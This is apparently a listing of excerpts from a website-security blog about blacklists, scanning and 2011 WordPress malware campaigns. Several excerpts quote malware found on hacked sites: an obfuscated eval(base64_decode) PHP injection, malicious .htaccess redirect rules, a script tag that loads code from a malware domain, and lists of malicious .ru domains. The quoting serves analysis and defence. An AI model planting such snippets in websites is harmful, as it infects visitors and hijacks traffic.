Google recently put out a post reviewing its past 5 years of offering the Safe Browsing program, titled: Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately? This got us thinking about the number of Google warnings end-users see every day, and naturally we couldn’t help but take [...]
How To: Remove McAfee SiteAdvisor Blacklisting
As more and more blacklisting authorities come online, it becomes important to understand how to go about submitting your site for a review. The most recent challenge has been figuring out how to get a site off the McAfee SiteAdvisor blacklist. You can read more about what SiteAdvisor is here: http://www.siteadvisor.com/howitworks/index.html What’s really [...]
Introducing Server-Side Scanning
We’re excited to announce the release of a new feature to all clients – server-side scanning. Web malware continues to evolve, making it challenging to detect using only HTTP fingerprinting techniques, such as the ones SiteCheck is restricted to. As such, we have been working to develop a new method of scanning that allows us to [...]
New Malware – Eval + GetMama + Encoded Javascript
We are seeing many WordPress sites on shared hosts getting compromised with an encoded JavaScript malware. It has multiple levels of obfuscation, and this is how it starts: 1- ALL PHP files get an eval(base64_decode line of code: /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa.. 2- That long piece of code, once executed, gets decoded to: if (!function_exists(GetMama)){function opanki ($buf){$god_mode = $_SERVER["good"]; [...]
New .htaccess attacks
We are seeing some interesting modifications to the old style of .htaccess attacks. The attackers are using a lot of referer domains and are using .in domains (along with the .ru ones). This is an example of a hacked .htaccess: RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin| [...]
New Malware – sweepstakesandcontestsnow.com
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with malware from sweepstakesandcontestsnow.com. This is what gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
We are often asked which domains were the top distributors of malware, or which threats we see most often on our security scanner. For the month of August, things were very similar to the previous months, with a slight increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware update – Timthumb.php and .htaccess redirection
We have been very busy in our blog explaining the latest TimThumb.php vulnerability and the effect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
More spam (via .htaccess) to search-box.in and malware from savebotstat.com
Very interesting .htaccess redirection that sends traffic from Google and Yahoo image search to search-box.in. This is what gets added to the hacked site: AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [...]
.htaccess redirections to software-boss.ru and programmengineering.ru
Just an update to the .htaccess redirection attacks that we have been tracking for the last few days (most of them to .ru domains). These are some of the domains being used right now: http://software-boss.ru/grammar/index.php additionalprofit.ru boss-united.ru clear-agent.ru clearagent.ru face-apple.ru fightagent.ru power-update.ru programmprofit.ru software-boss.ru syntaxswitch.ru window-switch.ru http://powerprogramm.ru/make/index.php http://jaobsofterty.ru/in.cgi?2 http://programmengineering.ru/check/index.php It is happening on [...]